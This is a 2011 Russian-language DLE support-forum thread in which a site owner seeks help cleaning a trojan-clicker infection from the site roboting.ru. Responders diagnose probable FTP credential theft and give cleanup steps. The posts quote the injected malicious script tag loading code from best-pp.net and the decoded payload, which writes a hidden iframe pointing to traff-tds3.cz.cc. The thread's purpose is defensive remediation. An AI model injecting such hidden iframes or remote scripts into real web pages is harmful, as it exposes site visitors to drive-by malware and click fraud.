leksa 0 Опубликовано: 24 августа 2011 Рассказать Опубликовано: 24 августа 2011 Итак сайт http://roboting.ru Вду 9.2 лицензия В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера». http://roboting.ru/1021-neato-xv-11-poboretsja-s-roomba-na.html 19.08.2011 Поведенческий анализ http://roboting.ru/space-robots/ 19.08.2011 Поведенческий анализ http://roboting.ru/809-nepobedimye-transformery-teper-i-na.html 20.08.2011 Поведенческий анализ http://roboting.ru/16-teorija-promyshlennykh-robotov.html 24.08.2011 Поведенческий анализ http://roboting.ru/1021-neato-xv-11-poboretsja-s-roomba-na.html 24.08.2011 Exploit http://roboting.ru/809-nepobedimye-transformery-teper-i-na.html 24.08.2011 Exploit http://roboting.ru/space-robots/ 24.08.2011 Поведенческий анализ http://roboting.ru/ 24.08.2011 Поведенческий анализ http://roboting.ru/space-robots/ 24.08.2011 Exploit http://roboting.ru/1021-neato-xv-11-poboretsja-s-roomba-na.html 24.08.2011 Поведенческий анализ Не могу найти код трояна на сайте. У людей ругается на во это <script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://best-pp.net/in.php?id=9544&quo...script> Комп почистил, пароли поменял Помогите обезвредить этот вирус. Спасибо! Цитата Ссылка на сообщение Поделиться на других сайтах
Compton 34 Опубликовано: 24 августа 2011 Рассказать Опубликовано: 24 августа 2011 А вот и содержание эксплойта: document.write('<div style="position: absolute;left: 0;bottom: 100%;"><iframe src="http://traff-tds3.cz.cc/forum.php" width=10 height=49></iframe></div>'); Может модули левые ставил? Цитата Ссылка на сообщение Поделиться на других сайтах
leksa 0 Опубликовано: 24 августа 2011 Рассказать Опубликовано: 24 августа 2011 Автор Подскажите как вы его нашли и где? модули стоят сторонние такие: 1. последниме коменты в левом сайдбаре и еще коменты которые сейчас отключены, которые выводят новости с картинками Цитата Ссылка на сообщение Поделиться на других сайтах
Compton 34 Опубликовано: 24 августа 2011 Рассказать Опубликовано: 24 августа 2011 Нашел я его по ссылке из того-самого скрипта, который висит в шапке вашего сайта. По идее данный скрипт должен был выводить на вашем сайте какую-нибудь какашку вроде окошка, баннера и т.п. Но вывести не смог наверно потому, что в DLE заблокирован тег <iframe>. Ссылки на установленные модули приведите, пожалуйста. Или листинги. Цитата Ссылка на сообщение Поделиться на других сайтах
- Den - 32 Опубликовано: 24 августа 2011 Рассказать Опубликовано: 24 августа 2011 Цитата Ссылка на сообщение Поделиться на других сайтах
leksa 0 Опубликовано: 24 августа 2011 Рассказать Опубликовано: 24 августа 2011 Автор Итак. я смотрю у меня группа фэйсбук выводится через тег iframe. но из-за этого не должно ругаться? Модули стоят такие: 1. topnews_mod.php 2. engine/modules/iComm/run.phpДен, такую. же шляпу и я видел. Но это после того как появился вирус. Видимо он выводит, и получается такой бред Раньше такого не было Цитата Ссылка на сообщение Поделиться на других сайтах
Compton 34 Опубликовано: 24 августа 2011 Рассказать Опубликовано: 24 августа 2011 У меня в Opera все нормально выводится. Итак. я смотрю у меня группа фэйсбук выводится через тег iframe. но из-за этого не должно ругаться? Модули стоят такие: 1. topnews_mod.php 2. engine/modules/iComm/run.php Мне ваши ссылки ничего не дают. Модули платные? Если бесплатные, то приведите листинги прямо здесь. А еще попробуйте поискать эксплойт в файле index.php, обычно зараза далеко не уходит. Цитата Ссылка на сообщение Поделиться на других сайтах
leksa 0 Опубликовано: 24 августа 2011 Рассказать Опубликовано: 24 августа 2011 Автор модули бесплатные Не совсем понял, что такое листинги один модуль имеет название Последние Коментарии 3.3 Настройки модуля, функции Show Hint и параметры вывода блока. второй не знаю как точно называетсяВ index.php все уже перерыл. вроде нету Цитата Ссылка на сообщение Поделиться на других сайтах
Compton 34 Опубликовано: 24 августа 2011 Рассказать Опубликовано: 24 августа 2011 (изменено) Например вот это: $commentslast = dle_cache( "comments-last", $config['skin'] ); if( ! $commentslast ) { include( ROOT_DIR . "/engine/data/comments-last.php" ); if( $commentslast['on'] == "1" ) { define( "LIMITCOMM", $commentslast['lines'] ); define( "LIMITTITL", $commentslast['titlelimit'] ); define( "SHOWHITHB", $commentslast['showhint'] ); Это и есть тот самый листинг. - Den -, в FF такую же фигню показывает. ТС еще раз вам говорю, загляните в файл index.php! Заметите что нибудь подозрительное - пишите! Онлайн сканеры вам ничего не дадут! Они получают только HTML-код, а искать нужно в исходниках. Имя какашки: [Trojan-Clicker.HTML.IFrame (v)] FTP пользуетесь? edit: Попробуйте вызвать Диспетчер задач (Cntrl + Alt + Delete) и перейдите на вкладку "Процессы". Теперь ищите следующие процессы: DMEYN.EXE DMN.EXE DMV.EXE DMR.EXE DML.EXE DMT.EXE DMP.EXE RVL.EXE 1.EXE ZJ7.EXE ZJ9.EXE _DMN IT PAGALBA.EXE 18046662.EXE Если что-то подобное нашли, знайте - зараза попала на сайта с вашего компьютера. Изменено 24 августа 2011 пользователем Compton Цитата Ссылка на сообщение Поделиться на других сайтах
leksa 0 Опубликовано: 24 августа 2011 Рассказать Опубликовано: 24 августа 2011 Автор 1.Да, пользуюсь ФТП через Filezilla 2.залил index.php который идет с DLE Гляньте, что-нибудь поменялось или нет? 3. Модуль вот такой. Открыл главную страницу этого модуля и скопировал код: <?php Author: RooTM ------------------------------------------------------ Web-site: http://weboss.net/ =====================================================*/ if( ! defined( 'DATALIFEENGINE' ) ) { die( "Hacking attempt!" ); } $max_text = 70; $max_title = 30; $max_comm = 5; $groups_color = "group_1:#FF0000,group_2:#CC33CC,group_3:#009900,group_4:#3333FF"; $is_change = false; if ($config['allow_cache'] != "yes") { $config['allow_cache'] = "yes"; $is_change = true;} $iComm = dle_cache( "iComm", $config['skin'] ); if( $iComm === false ) { require_once ENGINE_DIR . '/classes/templates.class.php'; $tpl = new dle_template ( ); $tpl->dir = ENGINE_DIR . '/modules/iComm/'; define ( 'TEMPLATE_DIR', $tpl->dir ); $db->query( "SELECT comments.post_id,comments.user_id, comments.is_register, comments.text, comments.autor, comments.email,comments.approve, post.id, post.date as newsdate, post.title, post.category, post.comm_num, post.alt_name, post.flag,users.user_group,users.user_id FROM " . PREFIX . "_comments as comments, " . PREFIX . "_post as post, " . PREFIX . "_users as users WHERE post.id=comments.post_id AND comments.user_id = users.user_id AND comments.approve = 1 ORDER BY comments.date DESC LIMIT 0, " . $max_comm ); while ( $row = $db->get_row() ) {нет, нету таких процессов, Правда я проверял комп вчера на вирусы Цитата Ссылка на сообщение Поделиться на других сайтах
Compton 34 Опубликовано: 24 августа 2011 Рассказать Опубликовано: 24 августа 2011 В приведенном вами листинге вредоносного кода нет. После перезаливки ничего не поменялось. Попробуйте перезалить шаблон вашего сайта (все файлы). Цитата Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 24 августа 2011 Рассказать Опубликовано: 24 августа 2011 (изменено) да там вообще любой вредоносный код в базе может храниться, в самих новостях. можете до передоза проверять файлы движка, не поможет. поищи на форуме куча ссылок как лечиться от заразы было бы неплохо, если администрация вынесла эту тему куда то отдельной ссылкой, ибо куча тема плодится новых Изменено 24 августа 2011 пользователем prikindel Цитата Ссылка на сообщение Поделиться на других сайтах
leksa 0 Опубликовано: 24 августа 2011 Рассказать Опубликовано: 24 августа 2011 Автор перезалил шаблон Ну что? prikindel, ну атк подскажи куда копать если не сложно Чо в Бд искать? инородные таблицы? Цитата Ссылка на сообщение Поделиться на других сайтах
Compton 34 Опубликовано: 24 августа 2011 Рассказать Опубликовано: 24 августа 2011 (изменено) ТС, короче, есть самый радикальный, быстрый и эффективный метод. Называется переустановка движка. Заходите сюда : engine/data Папка живет тут: http://roboting.ru/engine/data Копируете оттуда все файлы себе на компьютер. Заходите сюда : engine/cache Папка живет тут: http://roboting.ru/engine/cache Копируете оттуда все файлы себе на компьютер. Чтобы в дальнейшем работали категории, группы пользователей и т.д. Если надо, копируете папку backup из корня сайта. В ней могут хранится дампы БД (если вы конечно их делали). Папка живет тут: http://roboting.ru/backup/ Сносите подчистую движок. Теперь заранее скопированную папку data кидаете в папку с движком на вашем компьютере (в папку engine). Подтверждаете замену файлов. Папку cache туда же. Копируете папку backup в корневую папку. Заливаете папку с движком себе на сайт. Внимание! Жмякать в install.php не надо! Установка нам не нужна. Смотрите. зараза исчезла - ура! Не исчезла - значит, как сказал prikindel, гадость где-то в БД. Изменено 24 августа 2011 пользователем Compton Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 068 Опубликовано: 24 августа 2011 Рассказать Опубликовано: 24 августа 2011 перезалил шаблон Ну что? Перезаливать нужно не только шаблон, но и все оригинальные файлы скрипта, вернув все оригинальные. да там вообще любой вредоносный код в базе может храниться, в самих новостях. можете до передоза проверять файлы движка, не поможет. Ничего в БД у автора не хранится, это видно по коду страницы, сам вирус выводится самой первой строкой, что говорит, что он скорее всего где то в одном из файлов скрипта. А по причине обычного воровства FTP доступа, т.к. эти файлы только по FTP, можно поменять. Как воруются доступы и какие меры предпринять вы можете прочитать в темах на форуме http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979 http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe Там подробно описано как могут вороваться FTP доступы и как от этого защитится. Проверяйте свой компьютер на вирусы, меняйте все пароли, в том числе и по FTP и к БД. Установите ограничение по IP на доступ по FTP. Если после перезаливки файлов скрипта на оригинальные проблема не решится, то посмотрите вручную файлы в папке engine/data/ есть ли там код, т.к. в дистрибутиве нет файлов в этой папке и перезаливка дистрибутива не очистит эти файлы от гадости, если она в них. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.